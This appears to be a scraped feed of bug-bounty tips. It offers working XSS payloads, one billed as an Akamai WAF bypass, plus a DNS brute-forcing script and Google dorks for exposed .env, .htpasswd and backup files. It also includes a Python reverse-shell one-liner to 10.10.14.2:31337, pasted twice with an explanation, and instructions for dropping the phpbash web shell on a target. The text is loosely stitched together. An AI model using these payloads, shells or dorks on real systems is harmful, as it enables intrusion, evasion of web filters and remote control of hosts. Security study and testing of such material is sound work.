Bug bounty Tips

Akamai Kona WAF #XSS #Bypass 😎 1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)> Courtesy by @KN0X55 Pro v3.5 #BlackFriday2023 #CyberMonday2023

I got a XSS with this payload today. <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

🅰 small reverseDNS script on bash. #!/bin/bash echo "Bruteforcing DNS Infos for all Targets against found DNS server" for word in $(cat ./results/DNS-IP.txt);do echo $word >./results/var.tmp; for target in $(cat ./results/online-IP.txt);do server=$(cat ./results/var.tmp); #Wierd double loop .. well nslookup $target $server -type=any |tee -a ./results/$server-DNSanswers.txt ./results/$target/$target-DNSAnswerby$server.txt & done done rm ./results/var.tmp;

Top 20 Google Dorks 🐘 PHP ext:php inurl:? site:example[.]com 🤫 Juicy Extensions ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess site:example[.]com

You guys can check next one for the series of API cheat sheet with description.

"Understanding JSON API: A Comprehensive Guide" is a detailed resource on JSON APIs, essential for anyone in bug bounty or web application security. It covers key aspects of JSON APIs, including their structure, usage, and potential security vulnerabilities. Ideal for both beginners and seasoned professionals, this guide provides valuable insights into effectively working with and securing JSON APIs in the digital landscape. LINK: https://book.cipherops.tech/bug-bounty-notes/web-application/understanding-json-api-a-comprehensive-guide

First Part: Reverse Shell Code echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py This part creates a Python script file named test.py. The script establishes a reverse shell connection to the IP address 10.10.14.2 on port 31337. It redirects standard input (0), standard output (1), and standard error (2) to the socket, effectively allowing communication between the attacker's machine and the target machine. The script then calls /bin/sh -i, which spawns an interactive shell on the target machine. Second Part: Pseudo-Terminal Spawn python Copy code python -c 'import pty; pty.spawn("/bin/bash")' This command is executed in the terminal. It uses Python to import the pty module, which provides pseudo-terminal handling. The pty.spawn("/bin/bash") part spawns a new Bash shell, providing an interactive command-line interface.First Part: Reverse Shell Code python Copy code echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.2\",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py This part creates a Python script file named test.py. The script establishes a reverse shell connection to the IP address 10.10.14.2 on port 31337. It redirects standard input (0), standard output (1), and standard error (2) to the socket, effectively allowing communication between the attacker's machine and the target machine. The script then calls /bin/sh -i, which spawns an interactive shell on the target machine. Second Part: Pseudo-Terminal Spawn python Copy code python -c 'import pty; pty.spawn("/bin/bash")' This command is executed in the terminal. It uses Python to import the pty module, which provides pseudo-terminal handling. The pty.spawn("/bin/bash") part spawns a new Bash shell, providing an interactive command-line interface.

check it out its good

using this there is a hackthebox machine name bashed https://github.com/Arrexel/phpbash

phpbash is a standalone, semi-interactive web shell designed to assist in penetration tests, especially in scenarios where traditional reverse shells are not feasible. The design is based on the default Kali Linux terminal colors, providing a familiar environment for penetration testers. Requirements: JavaScript must be enabled on the client's browser for phpbash to function correctly. The target machine must allow the execution of the shell_exec PHP function, although the script can be easily modified to use an alternate function. Features: Single PHP file requirement. Utilizes POST-based requests. Supports the current working directory. Command history with arrow keys. Allows file uploads directly to the target directory. Custom Commands: cd: Return to the default shell directory. cd <path>: Change the directory. cd -: Return to the previous directory. clear: Clears all output. upload: Opens the file browser and uploads the selected file. Usage: Simply drop the phpbash.php or phpbash.min.php file onto the target machine and access it using any JavaScript-enabled web browser.

Will be back with some good content very soon

"Revolutionize the bug bounty landscape with our cutting-edge platform. By integrating AI for rapid vulnerability validation and generating insightful reports, we empower organizations to fortify their digital defenses swiftly. Say goodbye to delayed payments – our implementation of cryptocurrency transactions ensures ethical hackers receive their well-deserved rewards within hours. Join us in shaping a future where cybersecurity is not just effective but also seamlessly efficient."

Guys do u think, a BugBounty platform with, cryptocurrencies payments as bounties and, ai as developer to communicate with hacker

Recently encountered a challenging Stored XSS case: - No dots - No parentheses - No plus - No single quote - No space - Max 35 characters - Unlimited amount of payloads can be stored - Every payload is reflected twice @0xH4rmony and I came up with this: renniepak.nl/matrixss.html